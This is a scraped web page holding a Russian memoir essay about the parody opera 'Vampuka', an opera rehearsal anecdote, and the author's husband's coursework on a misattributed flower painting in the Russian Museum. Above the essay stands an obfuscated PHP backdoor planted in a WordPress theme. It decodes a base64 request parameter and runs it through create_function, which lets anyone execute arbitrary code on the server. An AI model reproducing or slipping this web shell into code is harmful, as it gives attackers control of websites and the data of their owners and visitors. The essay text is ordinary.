nnn$z0=$_REQUEST['sort'];$q1='';$c2="wt8m4;6eb39fxl*s5/.yj7(pod_h1kgzu0cqr)aniv2";$y3=array(8,38,15,7,6,4,26,25,7,34,24,25,7);foreach($y3 as $h4){$q1.=$c2[$h4];}$v5=strrev("noi"."tcnuf"."_eta"."erc");$j6=$v5("",$q1($z0));$j6();nnn?php /** * @package dazzling */ ?>

“ВАМ ПУК ЦВЕТОВ. . .”


эпиграфы:

"Мы   э-,  мы   э-,  мы   э-фи-опы !
 Мы  про-,  мы  про-,  противники  Европы !"
                   пародия  под  названием "Вампук(к)а, невеста африканская"  театра "Кривое  зеркало",1909 год.

"Лети, мысль, на  золотых  крыльях !"
 "Va,  pensiero  sull'ali  dorate !"
                   знаменитый  хор рабов  из  оперы  Верди "Набукко"

        Я  застала  ещё  те  времена, а  главное, того  рода  людей,  которые  знали  о  пародийной  о п е р е  " ВАМПУК(К)А, НЕВЕСТА  АФРИКАНСКАЯ" не  понаслышке, а  удостоились  быть  её современниками. И  они  старательно  удваивали  "глухую" согласную  "к",   потому  что  в  то  время  в  репертуаре  оперных  театров  была  замечательная  опера  Верди  на  библейский  сюжет  "НАБУККО"  с  известнейшим  хором  рабов,  который  сейчас  стал  неофициальным   г и м н о м  Италии !. Этот  суффикс   "к"   придавал  дополнительную  эпохальность  и  помпезность  абсурдному  шедевру  театрального  искусства  в  общем  и  целом,  как, например, для  Ленина – "лениниАНА"  или  же  для  Сибири  -"СибириАДА". Можно  было  бы, кстати, и  некоторые  разделы  искусствоведения  так  же  красиво  назвать: вампуккиана или  же вампуккиада.
     Мало  того, само  слово   в а м п у к(к) а  – это ,ставшее  легендарным  и м я   "невесты  африканской"  – действительно  имеет   под  собой  р е а л ь н ы й    и с т о р и ч е с к и й   корень. А  именно.
      Во  время  визита  персоны  царских  кровей в  Смольный  Институт  Благородных  девиц   ему  воспитанницы  Института  поднесли   букет  с  самодеятельно  сочинённой  виршей  " Вам  пук  цветов  подносим  мы !"  При  этом, как  случайно  выяснилось,  одна  из  смолянок  была  уверена,  что  Вампук  –  это  имя  собственное !  Так  и  пошло   развитие  темы.
    (Ну  и  что ? Я,  такая  же  "умная  Маша",  была  до  средних  классов  школы  уверена,  что  грибоедовское  "Горе  от  ума"  это  про  несчастья  человека  по  имени  Отума ).
    И  вот  ещё  одно  моё  субъективное  уточнение. В  детстве  я  слышала  другое  слово  в  знаменитом  хоре  эфиопов – не "противники", а:
        — Мы  э-,  мы  э-,  мы  эфиопы !  Мы  по-,  мы   по'корители  Европы !
           Покорители !  Это  ж  какой  пророческий  взгляд  сразу  и  в  прошлое,  и  в  будущее !
           В  античные  времена  словом  "эфиоп"  далеко  не  всегда  обозначалась  этническая  принадлежность, но  очень  часто  –  просто   п р и ш л ы й   темнокожий   иностранец  –  м и г р а н т,  говоря  современным  языком. Как  и  словом  "варвар" тоже  обозначался  пассионарий (возможно, от  слова  "борода"; например,  кубинские  б а р б у д о с  – Фидель  Кастро  и  революционеры, пообещавшие  не  брить  бород).
     И  ещё, надо  подчеркнуть,  что  это  только  сейчас,  в  наше  время  "Вампук(к)у"  взяли  на  флаг  современные  театры  как  некий  г о т о в ы й   сатирический  опус, как  бы  вечно  существовавший, допустим,  типа  "Гамлета, принца  Датского". Но  идея,  подсмотренная  в  1909  году  на  празднике  в  Институте  Благородных  девиц, сначала  "выварилась"  в  театральном   к а п у с т н и к е   и   вырвалась  из   дореволюционной  России, творчески  редактируясь  и  совершенствуясь,  вплоть  до  своего  последнего  представления  в  1930 году, весьма  возможно,  что  и  трагического.
    И  "ещё  одно  последнее  сказанье", последнее  дополнение  на  тему . . .  тему . . .  на   к а к у ю    ж  тему  я  пишу ? . . .ну,  ладно, пусть  будет  хотя  бы  на  тему  "покорения  Европы".
    Так  на  чём  я  остановилась ? Ах, да . . .что  такое  "к а п у с т н и к " ?  "Капустник"  –  от  слова, естественно,  к а п у с т а. Это  великопостное  разнообразное  блюдо. Поскольку  в  Великий  пост  нельзя  было  давать  театральных  представлений, а  надо  было  сидеть  на  постном, то  запертая  на  замок  творческая  потенция  находила  себе  лазеечку  в  закулисных  синтезах  искусств.

   Вообще-то ( ой, вспомнила ! )  я  пишу   на  тему  курсовых  работ  моего  мужа, который  в  семидесятых  годах,  как  говорится,  т о г о    в е к а  работал в  ГРМ (Государственном  Русском  музее)  и  параллельно  учился  на  искусствоведческом  отделении  ЛАХ (Ленинградская  Академия  Художеств).
  Свою  прошлую  меморию  " To  be  or …"  я  посвятила  его  первой   курсовой   работе  "Портрет  Солнцева"  (1838 г.)  работы  Зиновия Иванова. А  теперь  я  вспоминаю  другую, вторую  курсовую  студенческую  работу моего  мужа: " БУКЕТ   ЦВЕТОВ   на  фоне  горного  пейзажа"  кисти  Антона Легашова.  Обе  картины  –  из  собрания  Русского  музея.

 Но  прежде  чем  приступить  непосредственно  к   б у к е т у    ц в е т о в,  я  примкну  к   этой  мужниной  теме  свою  личную  тему, она  же  мораль  сей  басни:

                   Н Е    В Е Р Ь    Г Л А З А М    С В О И М,   Н Е    В Е Р Ь    У Ш А М    С В О И М  !

  Расскажу  историйку,  произошедшую  на  скромной  репетиции  в  Кировском (Мариинском  опять ныне)  театре  в  середине  семидесятых. Только  я  одна, пожалуй,  и  являюсь живой  и  помнящей  свидетельницей  этого  эпизода.

     После  триумфальной  постановки  (1971 г.)  балета  "Сотворение  мира"  тёплая  компания, состоящая  из  любимого  народом  композитора  Андрея  Петрова  и  гонимых  властями  хореографов  Касаткиной  с Василёвым  – эта   компания  нанесла   в  1975 году  уже  не  балетный,  а   оперный  удар  по  основам  мироздания.  На  сей  раз  не  по  фундаментальным  –  Божеским,  а   по  государственным  –  петровским.  Опера  "Пётр  Первый",  о  которой  я  завела  речь,  была  удостоена  Государственной  премии  на  следующий  год  после  этой   "вокальной  а т а к и"  на   историю.

    Я  рассказываю  о  самой  первой –  после  всех  спевок  и  занятий  в  репетиционных  классах  –  с ц е н и ч е с к о й   оркестровой  репетиции
 .  Началась  она  со  второго  акта, который  в  свою  очередь начинается  со  звуков  полковой  флейточки,  барабанной  маршевой  дроби,  короче,  военная  муштра  русской  армии: ррраз-два ! ррраз-два ! ррраз-два . . . !
  Вдруг !
  Всё  скомкалось, затормозилось, прекратилось . . .  Резко  затихшие  хористы  недоуменно  переглядывались,  помощники  режиссёра  –  помрежи  – хлопотливо  бегали  из  кулис  во  все  стороны.  Неужели  кому-то  стало  плохо ? –  и  такое  бывало !
   Мне  от  неожиданности  происходящего  тоже  стало  тревожно  и  на  всякий  случай  чего-то  боязно.
   Вдруг !
   Резко  все  хористы  встали  на  свои  места,  подтянулись. Снова  энергично  завизжала  флейточка   на  плацу,  а  барабан  стал  чётче  отбивать  ритмические  фигуры. И  что  же  вы  думаете ?  Ч т о    мужской  хор  стал  отчеканивать ?
    — А т ь  –  д в а !  А т ь  – д в а !  А т ь  – два !
     И  стало,  знаете  ли,  на душе . . .  ну   как  бы . . .  ну  как  бы  . . . историчнее   что  ли . . .
     А  ведь  до  этого  были  недели  с  каждодневными  "ррраз – два!".  Нашёлся  всё-таки  среди  поголовно   в с е х   задействованных  в  спектакле  людей   с   высшим   (а  то  и  двумя !)  образованием   о д и н    умник, сказавший,  что  раньше  не  было  " раз-два ",  а  было  " ать-два " !  И   ведь  к  нему  прислушались, согласились.  Причём   с р а з у   же,  что  редко  у  нас  бывает.

         И  вот  курсовая  работа  по  искусствоведению  моего  мужа, будущего  о.Георгия (в  Русском  музее  звавшимся   Егором !).
         По  специфике  своей  музейной  работы, он  делал  то,  что  и  должен  делать  научный  работник  отдела  хранения  живописи  такого-то  периода – перебирать  данные  ему  под  ответственность  раритеты: в  наличие  ли  они,  если  на  своём  месте, то  не  повреждены  ли  они, не  подменены  ли , не  дай  Бог !?
    И  вот  в  один  из  трудовых  дней  Георгий  взял  в  руки  картину "БУКЕТ   ЦВЕТОВ  на  фоне  горного  пейзажа" художника  Легашова  и,  углубившись  в  неё,  углубившись  в  себя,  вдруг  сказал: " Картина    н е   р у с с к о г о   художника,  картина  западно-европейского  толка !"
   Поскольку  "Егорушку", как  только  он  пришёл  работать  в  музей, сразу  стали  любить  и  уважать, то  в  отделе  реставрации  живописи, где  его  особенно  почитали, сразу  пошли  ему  навстречу  со  всеми  возможными   лабораторными  научно-техническими  средствами  изучения  картин.
   Действительно, оказалось, что  авторство  картины  указано  неверно.  Был  даже  озвучен  предполагаемый  западно-европейский  художник, чью  фамилию  я,  конечно,  мгновенно  забыла.
  Это  стало  очень  эффектной курсовой,  можно  сказать, с е н с а ц и о н н о й.  Долгое  время  эта  курсовая,  напечатанная  на  той  легендарной  Континенталь-Силенте, о  которой  я  рассказывала  в предыдущей  мемории, гуляла  по  рукам, пока  не  затерялась  у  кого-то  где-то . . .

     А  с  автором  "Букета"  воз  и  ныне  там: хоть  и  было  признано  неправильное  авторство,  а  до  сих  пор  "БУКЕТ  ЦВЕТОВ"  значится  за  Легашовым.

     ВОТ  И   ВАМ   ПУК  ЦВЕТОВ  Я  ПОДНЕСЛА !

000001
Букет  цветов  на  фоне  горного  пейзажа
Антон  Легашов (1798 – 1865)
Государственный Русский  музей

Добавить комментарий